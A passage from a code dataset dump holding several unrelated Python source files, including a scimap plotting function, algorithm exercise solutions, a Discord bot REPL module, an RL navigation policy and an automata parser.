“count”.\n For `distribution` plot, the following options are available: “hist”, “kde”, “ecdf”.\n The default for `numeric` plot is 'boxen'.\n The default for `distribution` plot is 'kde`.\n\n subset_col : string, optional\n If the users wants to consider only a subset of observations while plotting, this argument in conjuction to\n `subset_value` can be used.\n For example, in the event of a multi-image dataset, the `sm.tl.spatial_distance` was run on all images\n but the user is interested in plotting only a subset of images. Pass the name of the column which contains\n the categories to be subsetted.\n\n subset_value : list, optional\n If the users wants to consider only a subset of observations while plotting, this argument in conjuction to\n `subset_col` can be used. Pass a list of the categories to be subsetted.\n\n **kwargs : dict\n Are passed to sns.clustermap. Pass other parameters that works with `sns.clustermap`, `sns.catplot` or `sns.displot`\n e.g. `linecolor='black'`.\n\nReturns:\n Heatmap or Numeric Plot or Distribution Plot.\n\nExample:\n```python\n # summary heatmap\n sm.pl.spatial_distance (adata)\n\n # Heatmap without summarizing the individual images\n sm.pl.spatial_distance (adata, heatmap_summarize=False,\n imageid='ImageId')\n\n # Numeric plot of shortest distance of phenotypes\n # from tumor cells\n sm.pl.spatial_distance (adata, method='numeric',\n distance_from='Tumor CD30+',imageid='ImageId')\n\n # Distribution plot of shortest distance of phenotypes\n # from tumor cells\n sm.pl.spatial_distance (adata, method='distribution',\n distance_from='Tumor CD30+',imageid='ImageId',\n x_axis=\"distance\", y_axis=\"imageid\", plot_type=\"kde\")\n\n # Numeric plot of shortest distance of phenotypes from\n # tumor cells to M2 Macrophages\n sm.pl.spatial_distance (adata, method='numeric',\n distance_from='Tumor CD30+',distance_to = 'M2 Macrophages',\n imageid='ImageId')\n\n # Distribution plot of shortest distance of phenotypes from\n # tumor cells to M2 Macrophages\n sm.pl.spatial_distance (adata, method='distribution',\n distance_from='Tumor CD30+',distance_to = 'M2 Macrophages',\n imageid='ImageId')\n```\n \"\"\"\n\n\n # set color for heatmap\n cmap_updated = matplotlib.cm.get_cmap(heatmap_cmap)\n cmap_updated.set_bad(color=heatmap_na_color)\n\n\n # Copy the spatial_distance results from anndata object\n try:\n diatance_map = adata.uns[spatial_distance].copy()\n except KeyError:\n raise ValueError('spatial_distance not found- Please run sm.tl.spatial_distance first')\n\n # subset the data if user requests\n if subset_col is not None:\n if isinstance(subset_value, str):\n subset_value = [subset_value]\n # find the cell names to be subsetted out\n obs = adata.obs[[subset_col]]\n cells_to_subset = obs[obs[subset_col].isin(subset_value)].index\n\n # subset the diatance_map\n diatance_map = diatance_map.loc[diatance_map.index.intersection(cells_to_subset)]\n #diatance_map = diatance_map.loc[cells_to_subset]\n\n\n # Convert distance to log scale if user requests\n if log is True:\n diatance_map = np.log1p(diatance_map)\n\n # Method\n if method=='heatmap':\n if heatmap_summarize is True:\n # create the necessary data\n data = pd.DataFrame({'phenotype': adata.obs[phenotype]})\n data = pd.merge(data, diatance_map, how='outer',left_index=True, right_index=True) # merge with the distance map\n k = data.groupby(['phenotype']).mean() # collapse the whole dataset into mean expression\n d = k[k.index]\n else:\n # create new naming scheme for the phenotypes\n non_summary = pd.DataFrame({'imageid': adata.obs[imageid], 'phenotype': adata.obs[phenotype]})\n non_summary['imageid'] = non_summary['imageid'].astype(str) # convert the column to string\n non_summary['phenotype'] = non_summary['phenotype'].astype(str) # convert the column to string\n non_summary['image_phenotype'] = non_summary['imageid'].str.cat(non_summary['phenotype'],sep=\"_\")\n # Merge distance map with phenotype\n data = pd.DataFrame(non_summary[['image_phenotype']])\n data = pd.merge(data, diatance_map, how='outer',left_index=True, right_index=True)\n k = data.groupby(['image_phenotype']).mean()\n d = k.sort_index(axis=1)\n # Generate the heatmap\n mask = d.isnull() # identify the NAN's for masking \n d = d.fillna(0) # replace nan's with 0 so that clustering will work\n # Heatmap\n sns.clustermap(d, cmap=heatmap_cmap, row_cluster=heatmap_row_cluster,\n col_cluster=heatmap_col_cluster, mask=mask,\n standard_scale=heatmap_standard_scale, **kwargs)\n else:\n\n # condition-1\n if distance_from is None and distance_to is None:\n raise ValueError('Please include distance_from and/or distance_to parameters to use this method')\n\n # condition-2\n if distance_from is None and distance_to is not None:\n raise ValueError('Please `distance_from` parameters to use this method')\n\n # condition-3\n if distance_to is not None:\n # convert input to list if needed\n if isinstance(distance_to, str):\n distance_to = [distance_to]\n\n # Start\n pheno_df = pd.DataFrame({'imageid': adata.obs[imageid], 'phenotype': adata.obs[phenotype]}) #image id and phenotype\n data = pd.merge(pheno_df, diatance_map, how='outer',left_index=True, right_index=True) # merge with the distance map\n data = data[data['phenotype'] == distance_from] # subset the pheno of interest\n\n if distance_to is not None:\n data = data[distance_to] # drop columns that are not requested in distance_to\n else:\n data = data.drop(['phenotype','imageid'], axis=1) # drop the phenotype column before stacking\n\n d = data.stack().reset_index() # collapse everything to one column\n d.columns = ['cellid', 'group', 'distance']\n d = pd.merge(d, pheno_df, left_on='cellid', right_index=True) # bring back the imageid and phenotype\n\n # Convert columns to str\n for col in ['imageid', 'group','phenotype']:\n d[col] = d[col].astype(str)\n\n # Convert columns to categorical so that it drops unused categories\n for col in ['imageid', 'group','phenotype']:\n d[col] = d[col].astype('category')\n\n # re arrange the order based on from and to list provided\n if distance_to is not None:\n d['group'] = d['group'].cat.reorder_categories(distance_to)\n d = d.sort_values('group')\n\n # Plotting\n if method=='numeric':\n if x_axis is None and y_axis is None and facet_by is None and plot_type is None:\n sns.catplot(data=d, x=\"distance\", y=\"group\", col=\"imageid\", kind=\"boxen\", **kwargs)\n else:\n sns.catplot(data=d, x=x_axis, y=y_axis, col=facet_by, kind=plot_type, **kwargs)\n\n if method=='distribution':\n if x_axis is None and y_axis is None and facet_by is None and plot_type is None:\n sns.displot(data=d, x=\"distance\", hue=\"imageid\", col=\"group\", kind=\"kde\", **kwargs)\n else:\n sns.displot(data=d, x=x_axis, hue=y_axis, col=facet_by, kind=plot_type,**kwargs)\n\n # return\n if return_data is True:\n return d\n","repo_name":"labsyspharm/scimap","sub_path":"scimap/plotting/_spatial_distance.py","file_name":"_spatial_distance.py","file_ext":"py","file_size_in_byte":12247,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"71"} +{"seq_id":"8473418512","text":"def one_edit_away(first,second):\n if abs(len(first)-len(second)) > 1:\n return False\n\n if (len(first) < len(second)):\n s1 = first\n s2 = second\n else:\n s1 = second\n s2 = first\n\n index1 = 0\n index2 = 0\n\n found_diff = False\n while(index2 < len(s2) and index1 < len(s1)):\n if (s1[index1] != s2[index2]):\n if (found_diff):\n return False\n found_diff = True\n if (len(s1) == len(s2)):\n index1 += 1\n else:\n index1 += 1\n index2+=1\n\n return True\n \n \n","repo_name":"tanvirraihan142/CtCi-in-python","sub_path":"Chap 1/1.5.2 One Away.py","file_name":"1.5.2 One Away.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"15525597831","text":"class Solution:\n def countSubIslands(self, grid1: List[List[int]], grid2: List[List[int]]) -> int:\n rows = len(grid1)\n cols = len(grid1[0])\n vis = set()\n def dfs(r,c):\n if r<0 or c<0 or r==rows or c==cols or (r,c) in vis or grid2[r][c]==0:\n return True\n vis.add((r,c)) \n res = True\n if grid1[r][c]==0:\n res = False\n res = dfs(r-1,c) and res \n res = dfs(r+1,c) and res \n res = dfs(r,c-1) and res \n res = dfs(r,c+1) and res \n return res \n\n count = 0\n for r in range(rows):\n for c in range(cols):\n if grid2[r][c] and (r,c) not in vis and dfs(r,c):\n count +=1\n return count \n ","repo_name":"suman0907/leetcode","sub_path":"count-sub-islands/count-sub-islands.py","file_name":"count-sub-islands.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13068965997","text":"import asyncio\nfrom .internal import code_async as code\nfrom .internal import commands\n\nclass main:\n def __init__(self, client):\n self.client = client\n self.sessions = {}\n self.coreGlobals = {}\n self.coreLocals = {}\n\n @commands.ownerCommand(optional=True)\n async def repl(self, m, args):\n \"\"\"Start a repl session.\nUSAGE:\n repl [prefix]\n\nARGUMENTS:\n prefix: The prefix to start python commands with. Defaults to `.\"\"\"\n if self.sessions.get(m.channel.id, None) is None:\n if args is None:\n args = \"`\"\n sh = Shell(self.client, m, args, glob=self.coreGlobals, loc=self.coreLocals)\n self.sessions[m.channel.id] = sh, args\n await sh.interact(banner=\"REPL session started.\\nThe prefix is \" + args, exitmsg=\"Exiting REPL session...\")\n del self.sessions[m.channel.id]\n else:\n await self.client.send_message(m.channel, \"Err: There is already a REPL session running in this channel. Use \" + self.sessions[m.channel.id][1] + \"quit() to quit it.\")\n\n @commands.ownerCommand(\"quitrepl\")\n async def replquit(self, m, _):\n \"\"\"Quit a repl session.\nUSAGE:\n replquit\"\"\"\n if self.sessions.get(m.channel.id, None) is None:\n await self.client.send_message(m.channel, \"Err: There is no REPL session running in this channel.\")\n else:\n del self.sessions[m.channel.id]\n await self.client.send_message(m.channel, \"REPL session quit.\")\n\nclass Shell(code.InteractiveConsole):\n def __init__(self, client, message, prefix=\"`\", glob={}, loc={}):\n self.client = client\n self.m = message\n self.prefix = prefix\n code.InteractiveConsole.__init__(self)\n self.locals.update(glob)\n self.locals.update(loc)\n\n async def write(self, data):\n await self.client.send_message(self.m.channel, \"```python\\n\" + str(data) + \"```\")\n\n async def raw_input(self, p=\">>>\"):\n prompt = await self.client.send_message(self.m.channel, \"`\" + p + \"`\")\n def check(m):\n return m.content.startswith(self.prefix) and (not m.content.startswith(\"```\")) and (not m.content == \"`\" + p + \"`\")\n inp = await self.client.wait_for_message(author=self.m.author, channel=self.m.channel, check=check)\n res = str(inp.content)\n if res.lstrip(self.prefix).lower() in [\"quit()\", \"quit\", \"exit()\", \"exit\"]:\n raise EOFError\n if inp.author.id == self.client.user.id:\n await self.client.edit_message(inp, prompt.content + \" \" + res.strip(self.prefix))\n await self.client.delete_message(prompt)\n return res.strip(\"`\\n\")\n","repo_name":"BluCodeGH/BluBot","sub_path":"modules/repl.py","file_name":"repl.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"34085379350","text":"\n\nclass MySolution(object):\n \"\"\"\n 正常思路,利用二分法来完成,缺点是在找到中间数后要一次从左、从右开始遍历,这也造成了时间复杂度不是很理想\n Runtime: 24 ms, faster than 82.77% of Python online submissions for Find First and Last Position of Element in Sorted Array.\n Memory Usage: 11.4 MB, less than 60.93% of Python online submissions for Find First and Last Position of Element in Sorted Array.\n \"\"\"\n def searchRange(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n if nums == []:\n return [-1, -1]\n left_pos = 0\n right_pos = len(nums)\n \n while left_pos < right_pos:\n middle_pos = (right_pos - left_pos) // 2 + left_pos\n middle_val = nums[middle_pos]\n \n if middle_val == target:\n left = middle_pos\n while left >= 0 and nums[left] == target:\n left -= 1\n right = middle_pos\n while right < len(nums) and nums[right] == target:\n right += 1\n return [left + 1, right - 1]\n elif middle_val < target:\n left_pos = middle_pos + 1\n else: # middle_val > target:\n right_pos = middle_pos\n return [-1, -1]\n\n\nclass Solution(object):\n \"\"\"\n 利用python语法的index来完成,通过两次index来定位目标位置即可,找不到报错就拦截\n Runtime: 20 ms, faster than 100.00% of Python online submissions for Find First and Last Position of Element in Sorted Array.\n Memory Usage: 11.9 MB, less than 5.30% of Python online submissions for Find First and Last Position of Element in Sorted Array.\n \"\"\"\n def searchRange(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n try:\n return [nums.index(target),len(nums)-list(reversed(nums)).index(target)-1]\n except:\n return [-1,-1]\n\n\n \n","repo_name":"sandwu/leetcode_problems","sub_path":"1.Array/medium/34. Find First and Last Position of Element in Sorted Array.py","file_name":"34. Find First and Last Position of Element in Sorted Array.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"25702962657","text":"import pandas as pd\nfrom datetime import datetime\n\ndef get_date_columns(dataframe):\n date_columns = []\n\n # Iterate through the DataFrame columns and check if they are datetime objects\n for column in dataframe.columns:\n if pd.api.types.is_datetime64_any_dtype(dataframe[column]):\n date_columns.append(column)\n\n return date_columns\n\ndef date_column_info(col):\n current_date = datetime.now()\n col_info = {}\n\n col_info[\"Number of Unique Values\"] = len(col.unique())\n col_info[\"Number of Rows with Missing Values\"] = col.isnull().sum()\n col_info[\"Number of Weekend Dates\"] = sum(col.dt.weekday.isin([5,6]))\n col_info[\"Number of Weekday Dates\"] = sum(col.dt.weekday.isin([0,1,2,3,4]))\n col_info[\"Number of Dates in Future\"] = sum(col > current_date)\n col_info[\"Number of Rows with 1900-01-01\"] = sum(col == '1900-01-01')\n col_info[\"Number of Rows with 1970-01-01\"] = sum(col == '1970-01-01')\n col_info[\"Minimum Value\"] = col.min()\n col_info[\"Maximum Value\"] = col.max()\n\n return col_info\n\ndef date_value_frequency(dataframe, column):\n # find top 20 most frequent values\n value_counts = dataframe[column].value_counts()\n df_freq = pd.DataFrame({'value': value_counts.index, 'occurence': value_counts.values})[:20]\n df_freq['percentage'] = (df_freq['occurence'] / len(dataframe))*100\n\n return df_freq","repo_name":"prateeknc/eda-app","sub_path":"tab_date/logics.py","file_name":"logics.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"69966984870","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\n\nimport nav_analysis.rl.resnet\nfrom nav_analysis.rl.layer_norm_lstm import LayerNormLSTM\nfrom nav_analysis.rl.ppo.policy import Net as PPONet, Policy\nfrom nav_analysis.rl.ppo.utils import CategoricalNet, Flatten\nfrom nav_analysis.rl.running_mean_and_var import RunningMeanAndVar\n\n\nclass HRLPolicy(nn.Module):\n def __init__(\n self,\n pointnav_agent: Policy,\n hidden_size=512,\n num_recurrent_layers=2,\n rnn_type=\"LSTM\",\n ):\n super().__init__()\n self.pointnav_agent = pointnav_agent\n\n self.net = Net(\n hidden_size=hidden_size,\n num_recurrent_layers=num_recurrent_layers,\n rnn_type=rnn_type,\n )\n\n def forward(self, *x):\n return None\n\n def _pack_hidden(self, net_hidden_states, pointnav_hidden_states):\n # net_hidden_states = net_hidden_states.view(2, -1, 512)\n return torch.cat([net_hidden_states, pointnav_hidden_states], 0)\n\n def _unpack_hidden(self, hidden_states):\n net_hidden_states = hidden_states[0:4]\n # net_hidden_states = net_hidden_states.view(4, -1, 256)\n pointnav_hidden_states = hidden_states[4:]\n\n return (net_hidden_states, pointnav_hidden_states)\n\n def act(\n self, observations, rnn_hidden_states, prev_actions, masks, deterministic=False\n ):\n net_hidden_states, pointnav_hidden_states = self._unpack_hidden(\n rnn_hidden_states\n )\n\n value, goal_preds, net_hidden_states, pg_masks, pg_model_steps = self.net(\n observations, net_hidden_states, prev_actions, masks\n )\n observations[\"pointgoal\"] = goal_preds\n\n (\n _,\n action,\n action_log_probs,\n entropy,\n pointnav_hidden_states,\n ) = self.pointnav_agent.act(\n observations, pointnav_hidden_states, prev_actions, pg_masks, deterministic\n )\n\n return (\n value,\n action,\n action_log_probs,\n entropy,\n self._pack_hidden(net_hidden_states, pointnav_hidden_states),\n goal_preds,\n pg_masks,\n pg_model_steps,\n )\n\n def get_value(self, observations, rnn_hidden_states, prev_actions, masks):\n net_hidden_states, pointnav_hidden_states = self._unpack_hidden(\n rnn_hidden_states\n )\n\n return self.net(observations, net_hidden_states, prev_actions, masks)[0]\n\n def evaluate_actions(\n self, observations, rnn_hidden_states, prev_actions, masks, action\n ):\n net_hidden_states, pointnav_hidden_states = self._unpack_hidden(\n rnn_hidden_states\n )\n\n value, goal_preds, net_hidden_states, pg_masks, _ = self.net(\n observations, net_hidden_states, prev_actions, masks\n )\n observations[\"pointgoal\"] = goal_preds\n\n (\n _,\n action_log_probs,\n distribution_entropy,\n rnn_hidden_states,\n _,\n ) = self.pointnav_agent.evaluate_actions(\n observations, pointnav_hidden_states, prev_actions, pg_masks, action\n )\n return (value, action_log_probs, distribution_entropy, rnn_hidden_states, None)\n\n\n@torch.jit.script\ndef update_ego_motion(\n prev_pg, ego, goal_preds, masks, pg_model_steps, pg_masks, updated_goal_preds\n):\n r = torch.norm(goal_preds, p=2, dim=-1, keepdim=True)\n xy = goal_preds / r\n goal_preds = torch.cat([r, xy], dim=-1)\n\n T = ego.size(0)\n for t in range(T):\n r = prev_pg[:, 0:1]\n xy = r * prev_pg[:, 1:]\n xy = torch.stack([xy[:, 1], -xy[:, 0]], -1)\n xy = torch.baddbmm(\n ego[t, :, :, 2:], ego[t, :, :, 0:2], xy.unsqueeze(-1)\n ).squeeze(-1)\n xy = torch.stack([-xy[:, 1], xy[:, 0]], -1)\n\n r = torch.norm(xy, p=2, dim=-1, keepdim=True)\n xy = xy / r\n\n new_pg = torch.cat([r, xy], -1)\n pg_masks[t] = (\n (new_pg[:, 0] < 0.25).float()\n * masks[t]\n * (pg_model_steps[t] == 0.0).float()\n )\n\n updated_goal_preds[t] = torch.where(\n pg_masks[t].byte().unsqueeze(-1), new_pg, goal_preds[t]\n )\n prev_pg = updated_goal_preds[t].clone()\n\n return pg_masks, updated_goal_preds\n\n\nclass Net(PPONet):\n \"\"\"Network which passes the input image through CNN and concatenates\n goal vector with CNN's output and passes that through RNN.\n \"\"\"\n\n def __init__(self, hidden_size, num_recurrent_layers, rnn_type):\n nn.Module.__init__(self)\n\n self.pointnav_agent_action_embedding = nn.Embedding(5, 32)\n self._n_prev_action = 32\n\n self._hidden_size = hidden_size\n self.hidden_size = hidden_size\n\n self.feature_compress = nn.Sequential(\n Flatten(), nn.Linear(2048, hidden_size), nn.ReLU(True)\n )\n self.goal_predictor = nn.Linear(self.hidden_size, 2)\n self.critic_linear = nn.Linear(self.hidden_size, 1)\n\n self._rnn_type = rnn_type\n self._num_recurrent_layers = num_recurrent_layers\n if rnn_type == \"LN-LSTM\":\n self.rnn = LayerNormLSTM(\n hidden_size + self._n_prev_action,\n hidden_size,\n num_layers=num_recurrent_layers,\n )\n else:\n self.rnn = getattr(nn, rnn_type)(\n hidden_size + self._n_prev_action,\n hidden_size,\n num_layers=num_recurrent_layers,\n )\n\n self.layer_init()\n self.train()\n\n def layer_init(self):\n\n for name, param in self.rnn.named_parameters():\n if \"weight\" in name:\n nn.init.orthogonal_(param)\n elif \"bias\" in name:\n nn.init.constant_(param, 0)\n\n for layer in self.modules():\n if isinstance(layer, nn.Linear):\n nn.init.orthogonal_(layer.weight, gain=0.01)\n nn.init.constant_(layer.bias, 0)\n\n nn.init.constant_(self.goal_predictor.bias, 1.0 / np.sqrt(2))\n\n def _update_pg(self, observations, goal_preds, masks, N):\n prev_pg = observations[\"prev_pointgoal\"]\n T = prev_pg.size(0) // N\n prev_pg = prev_pg.view(T, N, -1)\n ego = observations[\"ego_motion\"]\n ego = ego.view(T, N, *ego.size()[1:])\n pg_model_steps = torch.fmod(observations[\"pg_model_steps\"].view(T, N) + 1, 10)\n\n masks = masks.view(T, N)\n goal_preds = goal_preds.view(T, N, -1)\n pg_masks = torch.zeros(T, N, device=masks.device)\n updated_goal_preds = prev_pg.clone()\n prev_pg = prev_pg[0]\n pg_masks, updated_goal_preds = update_ego_motion(\n prev_pg,\n ego,\n goal_preds,\n masks,\n pg_model_steps,\n pg_masks,\n updated_goal_preds,\n )\n\n updated_goal_preds = updated_goal_preds.view(T * N, -1)\n pg_masks = pg_masks.view(T * N, 1)\n pg_model_steps = pg_model_steps.view(T * N, 1)\n\n return updated_goal_preds, pg_masks, pg_model_steps\n\n def forward(self, observations, rnn_hidden_states, prev_actions, masks):\n prev_actions = self.pointnav_agent_action_embedding(\n ((prev_actions.float() + 1) * masks).long().squeeze(-1)\n )\n\n features = observations[\"features\"]\n features = self.feature_compress(features)\n x = torch.cat([features, prev_actions], dim=1)\n x, rnn_hidden_states = self.forward_rnn(x, rnn_hidden_states, masks)\n\n goal_preds = self.goal_predictor(x)\n\n goal_preds, pg_masks, pg_model_steps = self._update_pg(\n observations, goal_preds, masks, rnn_hidden_states.size(1)\n )\n\n return (\n self.critic_linear(x),\n goal_preds,\n rnn_hidden_states,\n pg_masks,\n pg_model_steps,\n )\n","repo_name":"erikwijmans/emergence-of-maps","sub_path":"nav_analysis/rl/ppo/hrl_policy.py","file_name":"hrl_policy.py","file_ext":"py","file_size_in_byte":7985,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"71"} +{"seq_id":"27040379641","text":"# Template for code submission\n# Name :Alyssa Chonko\n# Email :alc258@pitt.edu\n# Date :10/28/26\n# Class :CS0008-f2016\n# instructor : Max Novelli (man8@pitt.edu)\n#\n# Description:\n# Assignment number 2\n#\n# Notes:\n#had to use a few variable/functions that were not learned in the chapter because i had to google\n#some things to figure out how to make the program work\n#also was not able to test because I couldn't get the test files to work properly.\n#for some reason my program was not recognizing them\n#\n# MN: please do not use inline comments\n#\n# ...and now let's program with Python\n\ndef main(): # Creates the main function\n x=1 #set a variable\n while x != 0: #create loop for entering file\n file = input(\"Enter the name of the file: \") #ask user for file name\n if file== \"quit\": #conditions for when user is finished\n x=0 #and wants to exit program\n if file==\"q\":\n x=0\n if file==\" \":\n x=0\n else: #if user does not want to exit, continue asking for file\n fh=open(file, 'r') #opens the file to read\n total_distance,line_count=file(fh) #assaigns value to function\n processFile() #goes to functions\n printKV()\n summary()\n\ndef processFile(fh): # creates process file function which reads file and loops\n # through all lines of file handled\n lines = fh.readlines() # read all lines and store them in variable files\n\n line_count = 0 # count how many lines there are in the file\n\n total_distance = 0 # count total distance\n\n for l in lines: # loop through each line in the file\n l = l.rstrip('\\n') # remove new line character\n\n data = l.split(',') # split name and distance\n\n if len(data) == 2: # only process lines where a name and\n # distance are found\n\n distance = float(data[1]) # set distance variable from value in file\n\n if (distance, float): # make sure distance is a float\n total_distance += distance\n\n\n line_count += 1 # increment line count\n fh.close #close file\n\n return (line_count, total_distance) # return the two values, line count and total distance\n\n\ndef printKV(key, value, klen = 0): # printKV: prints and formats key values\n if value == None: # print simple strings without value\n print(key)\n\n if (value, str): # check for different data types\n print('{:<{}}: {:>20}'.format(key, len(key) + klen, value)) #and format to be the correct length\n elif (value, float): #and decimal placement\n print('{:<{}}: {:>10.3f}'.format(key, len(key) + klen, value)) #(len is used for the length)\n elif (value, int):\n print('{:<{}}: {:>10}'.format(key, len(key) + klen, value))\n\ndef summary(totalLineCount, total_distance): #function for printing\n printKV('Totals', None)\n printKV('Total # of lines', totalLineCount)\n printKV('Total distance run', total_distance)\n\n\ndef main(): # Creates the main function\n x=1\n while x != 0:\n file = input(\"Enter the name of the file: \")\n if file== \"quit\":\n x=0\n if file==\"q\":\n x=0\n if file==\" \":\n x=0\n else:\n fh=open(file, 'r')\n # MN: this following statement assumes that you have defined a function named \"file\"\n #total_distance,line_count=file(fh)\n # MN: if you call processFile this way, you are not passing in the file handle/object\n # and you do not collect the output from it\n #processFile()\n # MN: here how you should have called processFile\n total_distance, line_count = processFiles(fh)\n # MN: if you call printKV without arguments, it cannot print anything\n #printKV()\n # MN: here how you should have been calling printKV\n printKV('File number of lines',line_count)\n printKV('File distance run',total_distance)\n # MN: if you call summary here you will run it after processing every file\n #summary()\n\n\nmain() # call the main function\n\n\n\n\n","repo_name":"alc258/Cs0008-f2016","sub_path":"f2016_cs8_alc258_a2/f2016_cs8_alc258_a2.py","file_name":"f2016_cs8_alc258_a2.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"40735209992","text":"import ply.yacc as yacc\nimport sys\n\nfrom am.am_lex import tokens\n\n\ndef update_cst(d1, d2, s):\n if isinstance(d2, dict):\n for r in d2:\n if r in d1:\n raise ValueError('Transition already defined state @%s read \\'%s' % (s, r))\n d1[r] = d2[r]\n elif isinstance(d2, list):\n for r, t in d2:\n if r in d1:\n raise ValueError(f'Transition already defined state @{s} read {r} : {t}')\n d1[r] = t\n\n\nclass AM:\n __slots__ = ('transitions', 'initial_state', 'end_states', 'undefined_state', 'nb_tapes', 'name')\n\n def __repr__(self):\n return f'{self.name} {self.nb_tapes} >{self.initial_state} {self.end_states} {self.undefined_state} {len(self.transitions)}/{sum(len(i) for i in self.transitions.values())}'\n\n def set_transitions(self, tr):\n self.transitions = {}\n for s in tr:\n self.transitions[s] = {}\n for t in tr[s]:\n if len(t) != self.nb_tapes:\n raise ValueError(f'inconsistent number of tapes in {self.name} {s} : got {len(t)}, expecting {self.nb_tapes}')\n sl = {len(l) for s in (t, tr[s][t][0]) for l in s}\n sl.discard(1)\n if len(sl) > 1:\n raise ValueError(f'inconsistent number of options in {self.name} {sl}')\n if not sl:\n mv, ns = tr[s][t][1:]\n if ns is None: ns = s\n update_cst(self.transitions[s], {tuple(r[0] for r in t): ((tuple(r[0] for r in tr[s][t][0])), mv, ns)}, s)\n else:\n mv, ns = tr[s][t][1:]\n if ns is None: ns = s\n for i in range(sl.pop()):\n update_cst(self.transitions[s], {tuple(r[i if len(r) > 1 else 0] for r in t): ((tuple(r[i if len(r) > 1 else 0] for r in tr[s][t][0])), mv, ns)}, s)\n\n\ndef p_all(p):\n '''\n all : am\n | all am\n '''\n if len(p) == 2:\n p[0] = [p[1]]\n else:\n p[0] = p[1]\n p[0].append(p[2])\n\n\ndef p_am(p):\n '''\n am : name specif trans\n '''\n res = AM()\n res.initial_state = p[2][0]\n res.end_states = p[2][1]\n res.undefined_state = p[2][2]\n res.nb_tapes = p[1][1]\n res.name = p[1][0]\n res.set_transitions(p[3])\n\n p[0] = res\n\n\ndef p_name(p):\n '''\n name : NEW STRING INT\n '''\n p[0] = p[2:]\n\n\ndef p_specif(p):\n '''\n specif : start\n | start ends\n | start ends s_error\n '''\n p[0] = p[1:]\n if len(p[0]) < 2:\n p[0].append(())\n if len(p[0]) < 3:\n p[0].append(('ERROR', 'ERROR'))\n p[0] = tuple(p[0])\n\n\ndef p_start(p):\n '''\n start : START STATE\n '''\n p[0] = p[2]\n\n\ndef p_ends(p):\n '''\n ends : end\n | ends end\n '''\n if len(p) == 2:\n p[0] = {p[1][0]: p[1][1]}\n else:\n p[0] = p[1]\n if p[2][0] in p[0]:\n raise ValueError(f'multiple end results for state {p[2][0]}')\n p[0][p[2][0]] = p[2][1]\n\n\ndef p_end(p):\n '''\n end : END STATE STRING\n s_error : UNDEFINED STATE STRING\n '''\n p[0] = p[2], p[3]\n\n\ndef p_am_1(p):\n '''\n trans : state_tr\n '''\n p[0] = {p[1][0]: p[1][1]}\n\n\ndef p_am_2(p):\n '''\n trans : trans state_tr\n '''\n p[0] = p[1]\n if p[2][0] in p[0]:\n update_cst(p[0][p[2][0]], p[2][1], p[2][0])\n else:\n p[0][p[2][0]] = p[2][1]\n\n\ndef p_state(p):\n '''\n state_tr : full_transition transition_list\n '''\n update_cst(p[1][1], p[2], p[1][0])\n p[0] = p[1]\n\n\ndef p_full_transition(p):\n '''\n full_transition : FROM STATE transition\n '''\n p[0] = p[2], {p[3][0]: p[3][1]}\n\n\ndef p_transition(p):\n '''\n transition : reads writes moves STATE\n transition : reads writes moves\n '''\n if not p[2]:\n p[2] = p[1]\n if len(set(len(i) for i in p[1:4])) > 1:\n raise ValueError('Inconsistent numbers of heads in transition')\n p[0] = tuple(p[1]), (tuple(p[2]), tuple(p[3]), p[4] if len(p) > 4 else None)\n\n\ndef p_transition_list(p):\n '''\n transition_list : transition_list transition\n | empty\n '''\n if len(p) == 2:\n p[0] = []\n else:\n p[0] = p[1]\n p[0].append(p[2])\n\n\ndef p_empty(p):\n 'empty :'\n pass\n\n\ndef p_reads(p):\n '''\n reads : letters\n | reads COMMA letters\n moves : MOVE\n | moves COMMA MOVE\n letters : LETTER\n | letters PIPE LETTER\n '''\n if len(p) == 2:\n p[0] = (p[1],)\n else:\n p[0] = p[1] + (p[3],)\n\n\ndef p_writes(p):\n '''\n writes : reads\n | empty\n '''\n p[0] = p[1] or []\n\n\ndef p_error(p):\n if p is None:\n print(\"Syntax error : unexpected end of file\", file=sys.stderr)\n else:\n print(f\"Syntax error in input on token {p.type} {p.value} on line {p.lineno} at pos {p.lexpos-p.lexer.linestart}\", file=sys.stderr)\n if p.type == p.value == 'END':\n print(\"Maybe you forgot the START statement before END ?\", file=sys.stderr)\n sys.exit(-1)\n\n\nparser = yacc.yacc()\n\n\ndef am_from_string(s):\n lm = parser.parse(s)\n for m in lm:\n for e in m.end_states:\n if e in m.transitions:\n raise ValueError(f\"end state {e} with transitions in {m.name}\")\n return lm\n","repo_name":"ChristophePapazian/Automatic-Machines-Simulator","sub_path":"am/am_parser.py","file_name":"am_parser.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"} +{"seq_id":"9192700297","text":"import csv\n\nimport numpy as np\n\ncol_filter = []\ncol_filter.append(list(range(0, 1))) # age\ncol_filter.append(list(range(1, 2))) # fnlwgt\n# col_filter.append(list(range(2, 3))) # sex\ncol_filter.append(list(range(3, 5))) # capital gain/loss\ncol_filter.append(list(range(5, 6))) # hours_per_week\ncol_filter.append(list(range(6, 15))) # employer\ncol_filter.append(list(range(15, 22))) # edu_num\ncol_filter.append(list(range(22, 31))) # edu\n# col_filter.append(list(range(31, 38))) # maritial\ncol_filter.append(list(range(38,53))) # occupation\ncol_filter.append(list(range(53, 59))) # relationship\n# col_filter.append(list(range(59,64))) # race\ncol_filter.append(list(range(64, 106))) # country\ncol_filter = 